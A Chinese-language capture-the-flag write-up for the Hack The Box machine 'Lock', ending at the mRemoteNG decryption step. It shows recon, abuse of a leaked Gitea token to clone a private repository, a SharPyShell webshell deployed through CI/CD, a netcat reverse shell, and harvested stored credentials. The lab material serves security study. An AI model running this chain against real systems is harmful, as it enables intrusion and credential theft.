Lock(锁)
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nmap 10.129.234.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 10:34 EDT
Nmap scan report for LOCK.Lock (10.129.234.64)
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3000/tcp open ppp
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nmap 10.129.234.64 -p 80,445,3000,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 10:35 EDT
Nmap scan report for LOCK.Lock (10.129.234.64)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Lock - Index
445/tcp open microsoft-ds?
3000/tcp open http Golang net/http server
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=f7a8ff3baaefe524; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=U-dK9KwuiqnoaaKyBACgiCHPvOI6MTc2MTY2MjE2Mzc3NTg0MDMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 28 Oct 2025 14:36:04 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=eb9093768792892b; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=SzX5CPkIwxPfaDgbqkUJgYCXnjg6MTc2MTY2MjE2NzE1NTE3NjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 28 Oct 2025 14:36:07 GMT
|_ Content-Length: 0
|_http-title: Gitea: Git with a cup of tea
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-28T14:36:31+00:00
|_ssl-date: 2025-10-28T14:37:11+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2025-10-27T14:06:07
|_Not valid after: 2026-04-28T14:06:07
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=10/28%Time=6900D4D3%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control
SF::\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCont
SF:ent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea
SF:=f7a8ff3baaefe524;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cooki
SF:e:\x20_csrf=U-dK9KwuiqnoaaKyBACgiCHPvOI6MTc2MTY2MjE2Mzc3NTg0MDMwMA;\x20
SF:Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Optio
SF:ns:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2028\x20Oct\x202025\x2014:36:04\x20
SF:GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme
SF:-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=devic
SF:e-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20
SF:cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:ap
SF:plication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlY
SF:SIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRf
SF:dXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8
SF:vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbm
SF:ciLCJzaXplcyI6IjU")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Meth
SF:od\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20G
SF:ET\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x20n
SF:o-transform\r\nSet-Cookie:\x20i_like_gitea=eb9093768792892b;\x20Path=/;
SF:\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=SzX5CPkIwxPfaDgbq
SF:kUJgYCXnjg6MTc2MTY2MjE2NzE1NTE3NjcwMA;\x20Path=/;\x20Max-Age=86400;\x20
SF:HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x2
SF:0Tue,\x2028\x20Oct\x202025\x2014:36:07\x20GMT\r\nContent-Length:\x200\r
SF:\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten
SF:t-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n
SF:400\x20Bad\x20Request");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-28T14:36:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.02 seconds
1.2. WEB 80 IIS
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# dirsearch -u http://10.129.234.64 -x 403 ,404
/root/.local/share/uv/tools/dirsearch/lib/python3.12/site-packages/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12293
Target: http://10.129.234.64/
[10:55:00] Scanning:
[10:55:05] 404 - 2KB - /.asmx
[10:55:05] 404 - 2KB - /.ashx
[10:55:09] 500 - 1KB - /.git
[10:55:09] 500 - 1KB - /.git/
[10:55:09] 301 - 159B - /.git/logs/refs -> http://10.129.234.64/.git/logs/refs/
[10:55:09] 301 - 165B - /.git/logs/refs/heads -> http://10.129.234.64/.git/logs/refs/heads/
[10:55:09] 301 - 174B - /.git/logs/refs/remotes/origin -> http://10.129.234.64/.git/logs/refs/remotes/origin/
[10:55:09] 301 - 167B - /.git/logs/refs/remotes -> http://10.129.234.64/.git/logs/refs/remotes/
[10:55:09] 301 - 160B - /.git/refs/heads -> http://10.129.234.64/.git/refs/heads/
[10:55:09] 301 - 162B - /.git/refs/remotes -> http://10.129.234.64/.git/refs/remotes/
[10:55:09] 301 - 169B - /.git/refs/remotes/origin -> http://10.129.234.64/.git/refs/remotes/origin/
[10:55:09] 301 - 159B - /.git/refs/tags -> http://10.129.234.64/.git/refs/tags/
[10:55:30] 404 - 2KB - /admin%20/
[10:55:31] 404 - 2KB - /admin.
[10:55:49] 301 - 158B - /aspnet_client -> http://10.129.234.64/aspnet_client/
[10:55:49] 301 - 151B - /assets -> http://10.129.234.64/assets/
[10:55:49] 404 - 2KB - /asset..
[10:55:57] 200 - 46B - /CHANGELOG.txt
[10:55:57] 200 - 46B - /CHANGELOG.TXT
[10:55:57] 200 - 46B - /ChangeLog.txt
[10:55:58] 200 - 46B - /Changelog.txt
[10:55:58] 200 - 46B - /changelog.txt
[10:56:09] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[10:56:20] 404 - 2KB - /index.php.
[10:56:20] 200 - 16KB - /index.html
[10:56:22] 404 - 2KB - /javax.faces.resource.../
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[10:56:22] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[10:56:22] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[10:56:22] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[10:56:22] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[10:56:22] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[10:56:26] 404 - 2KB - /login.wdm%2e
[10:56:45] 404 - 2KB - /rating_over.
[10:56:49] 404 - 2KB - /service.asmx
[10:56:55] 404 - 2KB - /static..
[10:57:00] 404 - 2KB - /umbraco/webservices/codeEditorSave.asmx
[10:57:04] 404 - 2KB - /WEB-INF./
[10:57:06] 404 - 2KB - /WebResource.axd?d=LER8t9aS
Task Completed
没东西 发现有git 但是访问不了
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64//changelog.txt
# Changelog
- Added first website version
1.3. web 3000 gitea
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# dirsearch -u http://10.129.234.64:3000/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/lock/reports/http_10.129.234.64_3000/__25-10-28_11-02-07.txt
Target: http://10.129.234.64:3000/
[11:02:07] Starting:
[11:02:21] 200 - 1KB - /.well-known/openid-configuration
[11:02:21] 200 - 206B - /.well-known/security.txt
[11:02:29] 303 - 38B - /admin -> /user/login
[11:02:30] 303 - 38B - /admin/ -> /user/login
[11:02:39] 200 - 16KB - /administrator
[11:02:39] 200 - 16KB - /administrator/
>>>> [11:02:43] 200 - 704B - /api/swagger
[11:03:00] 303 - 41B - /explore -> /explore/repos
[11:03:00] 200 - 15KB - /explore/repos
[11:03:01] 301 - 58B - /favicon.ico -> /assets/img/favicon.png
[11:03:07] 303 - 38B - /issues -> /user/login
[11:03:31] 200 - 279B - /sitemap.xml
[11:03:39] 200 - 10KB - /user/login/
[11:03:40] 401 - 50B - /v2
[11:03:40] 401 - 50B - /v2/
[11:03:40] 401 - 50B - /v2/_catalog
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64:3000//.well-known/openid-configuration
{
"issuer": "http://localhost:3000/",
"authorization_endpoint": "http://localhost:3000/login/oauth/authorize",
"token_endpoint": "http://localhost:3000/login/oauth/access_token",
"jwks_uri": "http://localhost:3000/login/oauth/keys",
"userinfo_endpoint": "http://localhost:3000/login/oauth/userinfo",
"introspection_endpoint": "http://localhost:3000/login/oauth/introspect",
"response_types_supported": [
"code",
"id_token"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"subject_types_supported": [
"public"
],
"scopes_supported": [
"openid",
"profile",
"email",
"groups"
],
"claims_supported": [
"aud",
"exp",
"iat",
"iss",
"sub",
"name",
"preferred_username",
"profile",
"picture",
"website",
"locale",
"updated_at",
"email",
"email_verified",
"groups"
],
"code_challenge_methods_supported": [
"plain",
"S256"
],
"grant_types_supported": [
"authorization_code",
"refresh_token"
]
}
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64:3000//.well-known/security.txt
# This site is running a Gitea instance.
# Gitea related security problems could be reported to Gitea community.
# Site related security problems should be reported to this site's admin.
Contact: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Policy: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Preferred-Languages: en
1.4. swagger
swagger 泄露
用这 swagger-hack 测试一下
拼接了一下路径,没有swagger.json文档,不能自动跑脚本,就手动测了几个,发现都是401,看了一下确实要鉴权
1.5. public repository
有一个py
import requests
import sys
import os
def format_domain(domain):
if not domain.startswith(('http://', 'https://')):
domain = 'https://' + domain
return domain
def get_repositories(token, domain):
headers = {
'Authorization': f'token {token}'
}
url = f'{domain}/api/v1/user/repos'
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json()
else:
raise Exception(f'Failed to retrieve repositories: {response.status_code}')
def main():
if len(sys.argv) < 2:
print("Usage: python script.py <gitea_domain>")
sys.exit(1)
gitea_domain = format_domain(sys.argv[1])
personal_access_token = os.getenv('GITEA_ACCESS_TOKEN')
if not personal_access_token:
print("Error: GITEA_ACCESS_TOKEN environment variable not set.")
sys.exit(1)
try:
repos = get_repositories(personal_access_token, gitea_domain)
print("Repositories:")
for repo in repos:
print(f"- {repo['full_name']}")
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
main()
就是一个获取仓库内容的脚本,要输入token信息
除了脚本,还知道了仓库的owner 为ellen.freeman
此外还发现了git有更新记录
里面有token
用这个token运行这个脚本试试
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# export GITEA_ACCESS_TOKEN=43ce39bb0bd6bc489284f2905f033ca467a6362f
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# python repos.py http://10.129.234.64:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
发现还有一个仓库 ellen.freeman/website
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" \
http://10.129.234.64:3000/api/v1/user/repos |jq .
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4140 0 4140 0 0 14063 0 --:--:-- --:--:-- --:--:-- 14081
[
{
"id": 1,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "dev-scripts",
"full_name": "ellen.freeman/dev-scripts",
"description": "",
"empty": false,
"private": false,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 29,
"language": "Python",
"languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts/languages",
"html_url": "http://localhost:3000/ellen.freeman/dev-scripts",
"url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts",
"link": "",
"ssh_url": "ellen.freeman@localhost:ellen.freeman/dev-scripts.git",
"clone_url": "http://localhost:3000/ellen.freeman/dev-scripts.git",
"original_url": "",
"website": "",
"stars_count": 0,
"forks_count": 0,
"watchers_count": 1,
"open_issues_count": 0,
"open_pr_counter": 0,
"release_counter": 0,
"default_branch": "main",
"archived": false,
"created_at": "2023-12-27T11:17:47-08:00",
"updated_at": "2023-12-27T11:36:42-08:00",
"archived_at": "1969-12-31T16:00:00-08:00",
"permissions": {
"admin": true,
"push": true,
"pull": true
},
"has_issues": true,
"internal_tracker": {
"enable_time_tracker": true,
"allow_only_contributors_to_track_time": true,
"enable_issue_dependencies": true
},
"has_wiki": true,
"has_pull_requests": true,
"has_projects": true,
"has_releases": true,
"has_packages": true,
"has_actions": false,
"ignore_whitespace_conflicts": false,
"allow_merge_commits": true,
"allow_rebase": true,
"allow_rebase_explicit": true,
"allow_squash_merge": true,
"allow_rebase_update": true,
"default_delete_branch_after_merge": false,
"default_merge_style": "merge",
"default_allow_maintainer_edit": false,
"avatar_url": "",
"internal": false,
"mirror_interval": "",
"mirror_updated": "0001-01-01T00:00:00Z",
"repo_transfer": null
},
{
"id": 5,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "website",
"full_name": "ellen.freeman/website",
"description": "",
"empty": false,
"private": true,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 7370,
"language": "CSS",
"languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/website/languages",
"html_url": "http://localhost:3000/ellen.freeman/website",
"url": "http://localhost:3000/api/v1/repos/ellen.freeman/website",
"link": "",
"ssh_url": "ellen.freeman@localhost:ellen.freeman/website.git",
"clone_url": "http://localhost:3000/ellen.freeman/website.git",
"original_url": "",
"website": "",
"stars_count": 0,
"forks_count": 0,
"watchers_count": 1,
"open_issues_count": 0,
"open_pr_counter": 0,
"release_counter": 0,
"default_branch": "main",
"archived": false,
"created_at": "2023-12-27T12:04:52-08:00",
"updated_at": "2024-01-18T10:17:46-08:00",
"archived_at": "1969-12-31T16:00:00-08:00",
"permissions": {
"admin": true,
"push": true,
"pull": true
},
"has_issues": true,
"internal_tracker": {
"enable_time_tracker": true,
"allow_only_contributors_to_track_time": true,
"enable_issue_dependencies": true
},
"has_wiki": true,
"has_pull_requests": true,
"has_projects": true,
"has_releases": true,
"has_packages": true,
"has_actions": false,
"ignore_whitespace_conflicts": false,
"allow_merge_commits": true,
"allow_rebase": true,
"allow_rebase_explicit": true,
"allow_squash_merge": true,
"allow_rebase_update": true,
"default_delete_branch_after_merge": false,
"default_merge_style": "merge",
"default_allow_maintainer_edit": false,
"avatar_url": "",
"internal": false,
"mirror_interval": "",
"mirror_updated": "0001-01-01T00:00:00Z",
"repo_transfer": null
}
]
我们可以直接clone 下他的仓库
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.234.64:3000/ellen.freeman/website.git
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 99.00 KiB/s, done.
Resolving deltas: 100% (35/35), done.
在 Readme.md 中可以发现提示
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
翻译:CI/CD 集成现已激活 - 对存储库的更改将自动部署到 Web 服务器
1.6. 利用CI/CD 自动部署WEBshell
结合windows IIS 的网站,这里可以考虑上传一个ASP的webshell
webshell/aspx/asp.net-backdoors/filesystembrowser.aspx at master · tennc/webshell · GitHub
┌──(root㉿kali)-[~/Desktop/htb/lock/SharPyShell]
└─# python SharPyShell.py generate -p 123
____ _ _ ____ ____ _ _ _
/ ___| _| || |_ __ _ _ __| _ \ _ _/ ___|| |__ ___| | |
\___ \|_ .. _|/ _` | '__| |_) | | | \___ \| '_ \ / _ \ | |
___) |_ _| (_| | | | __/| |_| |___) | | | | __/ | |
|____/ |_||_| \__,_|_| |_| \__, |____/|_| |_|\___|_|_|
|___/
#SharPyShell v1.3 - @splinter_code
SharPyShell webshell written correctly to: /root/Desktop/htb/lock/SharPyShell/output/sharpyshell.aspx
Upload it to the target server and let's start having some fun :)
提交的时候会要求你设置用户名和邮箱
2025-10-29 10:33:17.625 [info] > git -c user.useConfigOnly=true commit --quiet [3ms]
2025-10-29 10:33:17.625 [info] Author identity unknown
*** Please tell me who you are.
Run
git config --global user.email "you@example.com"
git config --global user.name "Your Name"
to set your account's default identity.
Omit --global to set the identity only in this repository.
fatal: no email was given and auto-detection is disabled
配置一下就行了
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git config --global user.email you@example.com
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git config --global user.name Name
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git push
Everything up-to-date
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git status
On branch main
Your branch is up to date with 'origin/main'.
Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: webshell.aspx
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git add .
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git commit -m shell
[main a382e9a] shell
1 file changed, 21 insertions(+)
create mode 100644 sharpyshell.aspx
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 4.95 KiB | 4.95 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.234.64:3000/ellen.freeman/website.git
73cdcc1..a382e9a main -> main
1.7. shell as ellen.freeman
还是先把shell弹回来
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.67] from (UNKNOWN) [10.129.234.64] 57861
PS C:\windows\system32\inetsrv> whoami
lock\ellen.freeman
PS C:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::6896:bf9e:e5c5:fb3f
Link-local IPv6 Address . . . . . : fe80::1f84:988f:20cf:a6d8%7
IPv4 Address. . . . . . . . . . . : 10.129.234.64
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%7
10.129.0.1
在 ellen.freeman 目录下发现了票据
PS C:\users\ellen.freeman> type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
验证一下
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nxc rdp 10.129.234.64 -u ellen.freeman -p YWFrWJk9uButLeqx
RDP 10.129.234.64 3389 LOCK [*] Windows 10 or Windows Server 2016 Build 20348 (name:LOCK) (domain:Lock) (nla:False)
RDP 10.129.234.64 3389 LOCK [-] Lock\ellen.freeman:YWFrWJk9uButLeqx (STATUS_LOGON_FAILURE)
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nxc rdp 10.129.234.64 -u ellen.freeman -p YWFrWJk9uButLeqx
RDP 10.129.234.64 3389 LOCK [*] Windows 10 or Windows Server 2016 Build 20348 (name:LOCK) (domain:Lock) (nla:False)
RDP 10.129.234.64 3389 LOCK [-] Lock\ellen.freeman:YWFrWJk9uButLeqx (STATUS_LOGON_FAILURE)
看一下能够看哪些东西
PS C:\users> PS C:\users> tree /a /f
Folder PATH listing
Volume serial number is 8592-A9D9
C:.
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---ellen.freeman
| | .git-credentials
| | .gitconfig
| |
| +---.ssh
| | authorized_keys
| |
| +---3D Objects
| +---Contacts
| +---Desktop
| +---Documents
| | config.xml
| |
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
+---gale.dekarios
\---Public
+---Documents
+---Downloads
+---Music
+---Pictures
\---Videos
1.8. 解密mRemoteNG
PS C:\users\ellen.freeman\documents> type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VN
CEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
这是一个 mRemoteNG 配置文件
可以使用 mremoteng_decrypt.py 一键解密(mRemoteNG的默认主密码为 mR3m)
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
